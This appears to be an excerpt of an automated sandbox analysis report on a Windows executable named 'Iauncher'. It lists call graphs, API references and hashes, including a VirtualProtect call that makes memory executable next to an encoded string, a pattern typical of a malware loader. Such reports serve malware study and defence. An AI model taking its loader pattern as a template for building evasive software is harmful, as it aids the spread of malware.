18486->18488 18487->18453 18487->18454 18488->18487 18490 f29bea 43 API calls 18489->18490 18491 f2a0da 18490->18491 18493 f2a117 IsValidCodePage 18491->18493 18498 f2a153 codecvt 18491->18498 18492 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18493->18498 18498->18492 18508->18480 18512 f1da2c LeaveCriticalSection 18509->18512 18511 f2a045 18511->18473 18512->18511 18514 f1fb51 18513->18514 18515 f1fb58 18513->18515 18514->18485 18514->18486 18515->18514 18516 f230e0 __Getctype 41 API calls 18515->18516 18517 f1fb79 18516->18517 18518 f24504 __Getctype 41 API calls 18517->18518 18519 f1fb8f 18518->18519 18521 f24562 18519->18521 18522 f24575 18521->18522 18523 f2458a 18521->18523 18522->18523 18525 f2a0a7 18522->18525 18523->18514 18526 f230e0 __Getctype 41 API calls 18525->18526 18527 f2a0ac 18526->18527 18635 f20aa1 18631->18635 18636 f20a72 18631->18636 18632 f20ab8 18634 f24396 ___free_lconv_mon 14 API calls 18632->18634 18633 f24396 ___free_lconv_mon 14 API calls 18633->18635 18634->18636 18635->18632 18635->18633 18636->18412 18638 f11f64 _strlen 18637->18638 18657 f111cf 18638->18657 18640 f11f71 18640->18223 18664 f333c3 18641->18664 18647 f330fa 18646->18647 18656 f33030 18646->18656 18888 f13333 18647->18888 18649 f11f47 43 API calls std::ios_base::_Init 18649->18656 18651 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18652 f33114 18651->18652 18652->18225 18653 f1405f 43 API calls 18653->18656 18654 f1b91e 44 API calls 18654->18656 18655 f13359 41 API calls std::ios_base::_Init 18655->18656 18656->18647 18656->18649 18656->18653 18656->18654 18656->18655 18658 f1123a 18657->18658 18661 f111e0 std::ios_base::_Init 18657->18661 18659 f133a8 std::ios_base::_Init 43 API calls 18658->18659 18660 f1123f 18659->18660 18662 f1116b std::ios_base::_Init 43 API calls 18661->18662 18663 f111e7 std::ios_base::_Init 18661->18663 18662->18663 18663->18640 18666 f333d1 18664->18666 18668 f333a9 18664->18668 18666->18668 18685 f12454 18666->18685 18695 f11d5b 18666->18695 18669 f331de 18668->18669 18835 f111b8 18669->18835 18672 f11f47 std::ios_base::_Init 43 API calls 18673 f33229 18672->18673 18838 f113ec 18673->18838 18675 f33244 18676 f13359 std::ios_base::_Init 41 API calls 18675->18676 18677 f3324d 18676->18677 18678 f33375 18677->18678 18684 f113c0 _Deallocate 41 API calls 18677->18684 18848 f11474 18677->18848 18858 f11537 18678->18858 18684->18677 18686 f12460 __EH_prolog3_catch 18685->18686 18702 f12247 18686->18702 18693 f12499 std::ios_base::_Ios_base_dtor 18721 f134b8 18693->18721 18694 f12543 codecvt 18694->18666 18821 f141cf 18695->18821 18697 f11d6e 18825 f1409b 18697->18825 18704 f12256 18702->18704 18703 f12274 18703->18693 18706 f11dfd 18703->18706 18704->18703 18733 f13ee5 18704->18733 18707 f142b1 std::_Lockit::_Lockit 7 API calls 18706->18707 18708 f11e0e 18707->18708 18709 f12577 int 9 API calls 18708->18709 18710 f11e21 18709->18710 18711 f11e34 18710->18711 18741 f12a25 18710->18741 18712 f14309 std::_Lockit::~_Lockit 2 API calls 18711->18712 18713 f11e6a 18712->18713 18713->18693 18716 f11e70 18717 f11e4b 18722 f1253b 18721->18722 18723 f134cf std::ios_base::_Init 18721->18723 18728 f12413 18722->18728 18727 f13508 18723->18727 18749 f121ed 18723->18749 18724 f18e4c Concurrency::cancel_current_task RaiseException 18725 f13521 18724->18725 18727->18724 18803 f14498 18728->18803 18730 f1241b 18731 f123d4 18730->18731 18807 f13185 18730->18807 18731->18694 18734 f13ef1 __EH_prolog3_catch 18733->18734 18735 f13f96 codecvt 18734->18735 18736 f12247 51 API calls 18734->18736 18735->18703 18739 f13f10 18736->18739 18737 f13f8e 18738 f12413 51 API calls 18737->18738 18738->18735 18739->18737 18740 f134b8 std::ios_base::_Init 43 API calls 18739->18740 18740->18737 18742 f12a39 18741->18742 18743 f11e44 18741->18743 18742->18743 18744 f1626e codecvt 43 API calls 18742->18744 18743->18716 18743->18717 18745 f12a45 codecvt 18744->18745 18752 f122a7 18749->18752 18753 f11f47 std::ios_base::_Init 43 API calls 18752->18753 18754 f122c6 18753->18754 18761 f12072 18754->18761 18772 f11f13 18761->18772 18803->18730 18804 f19267 18803->18804 18811 f1970c 18804->18811 18809 f13191 __EH_prolog3_catch 18807->18809 18808 f131cd codecvt 18808->18731 18809->18808 18812 f19715 18811->18812 18813 f19718 GetLastError 18811->18813 18822 f141e3 18821->18822 18823 f11d84 73 API calls 18822->18823 18824 f141ec std::ios_base::_Ios_base_dtor 18823->18824 18824->18697 18826 f140a7 __EH_prolog3_catch 18825->18826 18827 f12247 51 API calls 18826->18827 18828 f140b9 18827->18828 18829 f140bf 18828->18829 18830 f1418d 70 API calls 18828->18830 18831 f134b8 std::ios_base::_Init 43 API calls 18829->18831 18830->18829 18832 f1414c 18831->18832 18833 f12413 51 API calls 18832->18833 18836 f1626e codecvt 43 API calls 18835->18836 18837 f111bf 18836->18837 18837->18672 18839 f11403 18838->18839 18840 f11431 18839->18840 18841 f1146e 18839->18841 18847 f1141d 18839->18847 18861 f11100 18840->18861 18870 f13308 18841->18870 18847->18675 18849 f11480 __EH_prolog3_catch 18848->18849 18862 f1626e codecvt 43 API calls 18861->18862 18863 f11116 18862->18863 18864 f11f13 std::ios_base::_Init 43 API calls 18863->18864 18865 f11129 18864->18865 18871 f14438 std::ios_base::_Init 43 API calls 18870->18871 18872 f13312 18871->18872 18889 f1334b 18888->18889 18890 f1333b 18888->18890 18889->18651 18891 f113c0 _Deallocate 41 API calls 18890->18891 18891->18889 20297 f15a56 20298 f15a78 20297->20298 20302 f15a8d 20297->20302 20303 f15166 20298->20303 20306 f15181 20303->20306 20308 f151d2 20303->20308 20304 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20305 f151ea 20304->20305 20305->20302 20309 f1f17e 20305->20309 20307 f1f796 69 API calls 20306->20307 20306->20308 20307->20308 20308->20304 20310 f1f189 20309->20310 20311 f1f19e 20309->20311 20313 f1e2e0 __Wcrtomb 14 API calls 20310->20313 20311->20310 20312 f1f1a5 20311->20312 20319 f1f494 20312->20319 20315 f1f18e 20313->20315 20317 f1accf __strnicoll 41 API calls 20315->20317 20318 f1f199 20317->20318 20318->20302 20320 f1f4a7 _Fputc 20319->20320 20325 f1f233 20320->20325 20323 f1aa0b _Fputc 41 API calls 20324 f1f1b4 20323->20324 20324->20302 20326 f1f23f __FrameHandler3::FrameUnwindToState 20325->20326 20327 f1f245 20326->20327 20328 f1f279 20326->20328 20329 f1ac52 _Deallocate 29 API calls 20327->20329 20336 f1e417 EnterCriticalSection 20328->20336 20330 f1f260 20329->20330 20330->20323 20332 f1f285 20337 f1f3a8 20332->20337 20334 f1f29c 20346 f1f2c5 20334->20346 20336->20332 20338 f1f3bb 20337->20338 20339 f1f3ce 20337->20339 20338->20334 20349 f1f2cf 20339->20349 20341 f1f47f 20341->20334 20342 f1f3f1 20342->20341 20343 f1eea4 ___scrt_uninitialize_crt 66 API calls 20342->20343 20344 f1f41f 20343->20344 20353 f28b99 20344->20353 20356 f1e42b LeaveCriticalSection 20346->20356 20348 f1f2cd 20348->20330 20350 f1f2e0 20349->20350 20352 f1f338 20349->20352 20351 f28b59 43 API calls 20350->20351 20350->20352 20351->20352 20352->20342 20354 f28a78 ___scrt_uninitialize_crt 43 API calls 20353->20354 20355 f28bb2 20354->20355 20355->20341 20356->20348 22013 f2575a 22014 f25766 __FrameHandler3::FrameUnwindToState 22013->22014 22025 f1d9e4 EnterCriticalSection 22014->22025 22016 f2576d 22026 f2a86a 22016->22026 22019 f2578b 22045 f257b1 22019->22045 22024 f256aa 2 API calls 22024->22019 22025->22016 22027 f2a876 __FrameHandler3::FrameUnwindToState 22026->22027 22028 f2a8a0 22027->22028 22029 f2a87f 22027->22029 22048 f1d9e4 EnterCriticalSection 22028->22048 22030 f1e2e0 __Wcrtomb 14 API calls 22029->22030 22033 f2a884 22030->22033 22032 f2a8ac 22038 f2a8d8 22032->22038 22049 f2a7ba 22032->22049 22034 f1accf __strnicoll 41 API calls 22033->22034 22037 f2577c 22034->22037 22037->22019 22039 f255f4 GetStartupInfoW 22037->22039 22056 f2a8ff 22038->22056 22040 f25611 22039->22040 22041 f256a5 22039->22041 22040->22041 22042 f2a86a 42 API calls 22040->22042 22041->22024 22043 f25639 22042->22043 22043->22041 22044 f25669 GetFileType 22043->22044 22044->22043 22060 f1da2c LeaveCriticalSection 22045->22060 22047 f2579c 22048->22032 22050 f24339 __dosmaperr 14 API calls 22049->22050 22051 f2a7cc 22050->22051 22053 f25d94 6 API calls 22051->22053 22055 f2a7d9 22051->22055 22052 f24396 ___free_lconv_mon 14 API calls 22054 f2a82e 22052->22054 22053->22051 22054->22032 22055->22052 22059 f1da2c LeaveCriticalSection 22056->22059 22058 f2a906 22058->22037 22059->22058 22060->22047 22419 f15b05 22420 f15b14 22419->22420 22422 f15b38 22420->22422 22423 f1f994 22420->22423 22424 f1f9a7 _Fputc 22423->22424 22429 f1f8cb 22424->22429 22426 f1f9bc 22427 f1aa0b _Fputc 41 API calls 22426->22427 22428 f1f9c9 22427->22428 22428->22422 22430 f1f8dd 22429->22430 22432 f1f900 22429->22432 22431 f1ac52 _Deallocate 29 API calls 22430->22431 22433 f1f8f8 22431->22433 22432->22430 22434 f1f927 22432->22434 22433->22426 22437 f1f7d0 22434->22437 22438 f1f7dc __FrameHandler3::FrameUnwindToState 22437->22438 22445 f1e417 EnterCriticalSection 22438->22445 22440 f1f7ea 22446 f1f82b 22440->22446 22442 f1f7f7 22455 f1f81f 22442->22455 22445->22440 22447 f1eea4 ___scrt_uninitialize_crt 66 API calls 22446->22447 22448 f1f846 22447->22448 22449 f26d01 14 API calls 22448->22449 22450 f1f850 22449->22450 22451 f1f86b 22450->22451 22452 f24339 __dosmaperr 14 API calls 22450->22452 22451->22442 22453 f1f88f 22452->22453 22454 f24396 ___free_lconv_mon 14 API calls 22453->22454 22454->22451 22458 f1e42b LeaveCriticalSection 22455->22458 22457 f1f808 22457->22426 22458->22457
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
                                                                                                                                                                              • Instruction ID: 8a8b0bcc108814e8a7c180c98ff789f2ca0ae39e498eb02318fa155a2e198f5e
                                                                                                                                                                              • Opcode Fuzzy Hash: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
                                                                                                                                                                              • Instruction Fuzzy Hash: 99E08C72912238EBCB15DBC8D90498AF3FCEB45B10B1108A6F502D3200C274DE00D7D0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
                                                                                                                                                                              • Instruction ID: e4c1697a60ac69fe5df0f3b007600a6e5d7714c41e97d13003ae9764ffd513e3
                                                                                                                                                                              • Opcode Fuzzy Hash: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
                                                                                                                                                                              • Instruction Fuzzy Hash: A2C08C75410E208BCF298910A371BA63364A3D6792F801CDCC4420F743D91E9CC2F601
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 f259bc-f259c8 1 f25a5a-f25a5d 0->1 2 f25a63 1->2 3 f259cd-f259de 1->3 4 f25a65-f25a69 2->4 5 f259e0-f259e3 3->5 6 f259eb-f25a04 LoadLibraryExW 3->6 7 f25a83-f25a85 5->7 8 f259e9 5->8 9 f25a06-f25a0f GetLastError 6->9 10 f25a6a-f25a7a 6->10 7->4 12 f25a57 8->12 13 f25a11-f25a23 call f22d68 9->13 14 f25a48-f25a55 9->14 10->7 11 f25a7c-f25a7d FreeLibrary 10->11 11->7 12->1 13->14 17 f25a25-f25a37 call f22d68 13->17 14->12 17->14 20 f25a39-f25a46 LoadLibraryExW 17->20 20->10 20->14
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,A03C9F43,?,00F25AC9,?,?,00000000,00000000), ref: 00F25A7D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                              • Opcode ID: 4a356bf8f6a7dc8c2a379a8b87ba1c43ea808436c91fc4178f92982e6a1226f1
                                                                                                                                                                              • Instruction ID: a81d9b4ab31e24acbecdb6f3f72c525667567b1f240beb1a0e090a895292b16a
                                                                                                                                                                              • Opcode Fuzzy Hash: 4a356bf8f6a7dc8c2a379a8b87ba1c43ea808436c91fc4178f92982e6a1226f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D21E772E41635EBCB219B64FC86A5A7769DB41F70F150220E919E7290D738FD04FAD0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 21 f269bb-f269d4 22 f269d6-f269e6 call f2011d 21->22 23 f269ea-f269ef 21->23 22->23 29 f269e8 22->29 25 f269f1-f269fb 23->25 26 f269fe-f26a24 call f28f33 23->26 25->26 31 f26b97-f26ba8 call f162ac 26->31 32 f26a2a-f26a35 26->32 29->23 34 f26b8a 32->34 35 f26a3b-f26a40 32->35 39 f26b8c 34->39 37 f26a42-f26a4b call f16850 35->37 38 f26a55-f26a60 call f245c0 35->38 47 f26a6b-f26a6f 37->47 49 f26a4d-f26a53 37->49 46 f26a62 38->46 38->47 40 f26b8e-f26b95 call f160d3 39->40 40->31 50 f26a68 46->50 47->39 51 f26a75-f26a8c call f28f33 47->51 49->50 50->47 51->39 54 f26a92-f26aa4 call f25e56 51->54 56 f26aa9-f26aad 54->56 57 f26ac8-f26aca 56->57 58 f26aaf-f26ab7 56->58 57->39 59 f26af1-f26afd 58->59 60 f26ab9-f26abe 58->60 61 f26aff-f26b01 59->61 62 f26b7c 59->62 63 f26b70-f26b72 60->63 64 f26ac4-f26ac6 60->64 65 f26b03-f26b0c call f16850 61->65 66 f26b16-f26b21 call f245c0 61->66 67 f26b7e-f26b85 call f160d3 62->67 63->40 64->57 68 f26acf-f26ae9 call f25e56 64->68 65->67 78 f26b0e-f26b14 65->78 66->67 79 f26b23 66->79 67->57 68->63 77 f26aef 68->77 77->57 80 f26b29-f26b2e 78->80 79->80 80->67 81 f26b30-f26b48 call f25e56 80->81 81->67 84 f26b4a-f26b51 81->84 85 f26b53-f26b54 84->85 86 f26b74-f26b7a 84->86 87 f26b55-f26b67 call f28faf 85->87 86->87 87->67 90 f26b69-f26b6f call f160d3 87->90 90->63
                                                                                                                                                                              APIs
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00F26A42
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00F26B03
                                                                                                                                                                              • __freea.LIBCMT ref: 00F26B6A
                                                                                                                                                                                • Part of subcall function 00F245C0: HeapAlloc.KERNEL32(00000000,00F14449,?,?,00F18DF4,?,?,?,?,?,00F121CC,00F14449,?,?,?,?), ref: 00F245F2
                                                                                                                                                                              • __freea.LIBCMT ref: 00F26B7F
                                                                                                                                                                              • __freea.LIBCMT ref: 00F26B8F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                              • Opcode ID: 6da1c53396312c250be5d3d55c111846372d20309b1811c9bd555ce269bcdca9
                                                                                                                                                                              • Instruction ID: 906304bab35192d9b238e1f65797909ad5d752014da638fc4667a60fc7cc61ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 6da1c53396312c250be5d3d55c111846372d20309b1811c9bd555ce269bcdca9
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A51E973A01226AFEF259F64EC81EBB37A9EF44760B154129FC08D7150EB75CD50ABA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F11F47: _strlen.LIBCMT ref: 00F11F5F
                                                                                                                                                                              • VirtualProtect.KERNELBASE(00F8C030,000004AC,00000040,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00F33468
                                                                                                                                                                              • FreeConsole.KERNELBASE ref: 00F3346E
                                                                                                                                                                              Strings
                                                                                                                                                                              • 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 00F33427
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                                              • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
                                                                                                                                                                              • API String ID: 1248733679-32248209
                                                                                                                                                                              • Opcode ID: a73ef8ba50d5c4368ec00bdcf084cbee9af81699d0b068b70b6476f0e14ff03b
                                                                                                                                                                              • Instruction ID: 0bc46921a356df933d7868d702f4a7f9cc7f34a82e0226d1f4912b7f98e562ab
                                                                                                                                                                              • Opcode Fuzzy Hash: a73ef8ba50d5c4368ec00bdcf084cbee9af81699d0b068b70b6476f0e14ff03b
                                                                                                                                                                              • Instruction Fuzzy Hash: F301AD71B002089BDB08FBB4ED06BEE77A4AF04760F018125E601E71C1EF78AA05AB55
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00F20E0D,00000000,00F1AAD2,?,?,A03C9F43,00F1AAD2,?), ref: 00F20E24
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00F20E0D,00000000,00F1AAD2,?,?,A03C9F43,00F1AAD2,?), ref: 00F20E2B
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00F20E3D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                              • Opcode ID: 124113b8e807a0865acb4ad4205aef75d2bb12095c779c57359cfe69fb1d20a9
                                                                                                                                                                              • Instruction ID: 0d709948a0479dbd50820dcb9a2f55747c8f43a0278dea06ac78181253fe27e5
                                                                                                                                                                              • Opcode Fuzzy Hash: 124113b8e807a0865acb4ad4205aef75d2bb12095c779c57359cfe69fb1d20a9
                                                                                                                                                                              • Instruction Fuzzy Hash: A0D09E73100518BFCF052F60FD0D95D3F26AF543617054414BA495A132CF79B996FA50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 117 f28126-f28145 118 f2814b-f2814d 117->118 119 f2831f 117->119 120 f28179-f2819f 118->120 121 f2814f-f2816e call f1ac52 118->121 122 f28321-f28325 119->122 124 f281a1-f281a3 120->124 125 f281a5-f281ab 120->125 130 f28171-f28174 121->130 124->125 126 f281ad-f281b7 124->126 125->121 125->126 128 f281c7-f281d2 call f27caa 126->128 129 f281b9-f281c4 call f28b99 126->129 135 f28214-f28226 128->135 136 f281d4-f281d9 128->136 129->128 130->122 137 f28277-f28297 WriteFile 135->137 138 f28228-f2822e 135->138 139 f281db-f281df 136->139 140 f281fe-f28212 call f27870 136->140 145 f282a2 137->145 146 f28299-f2829f GetLastError 137->146 141 f28230-f28233 138->141 142 f28265-f28270 call f27d28 138->142 143 f282e7-f282f9 139->143 144 f281e5-f281f4 call f27c42 139->144 156 f281f7-f281f9 140->156 149 f28253-f28263 call f27eec 141->149 150 f28235-f28238 141->150 162 f28275 142->162 151 f28303-f28315 143->151 152 f282fb-f28301 143->152 144->156 148 f282a5-f282b0 145->148 146->145 157 f282b2-f282b7 148->157 158 f2831a-f2831d 148->158 167 f2824e-f28251 149->167 150->143 159 f2823e-f28249 call f27e03 150->159 151->130 152->119 152->151 156->148 163 f282e5 157->163 164 f282b9-f282be 157->164 158->122 159->167 162->167 163->143 168 f282c0-f282d2 164->168 169 f282d7-f282e0 call f1e2a9 164->169 167->156 168->130 169->130
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F27870: GetConsoleOutputCP.KERNEL32(A03C9F43,00000000,00000000,00000000), ref: 00F278D3
                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,00F3D558,00000000,0000000C,00000000,00000000,?,00000000,00F3D558,00000010,00F1F70D,00000000,00000000,00000000), ref: 00F2828F
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00F28299
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
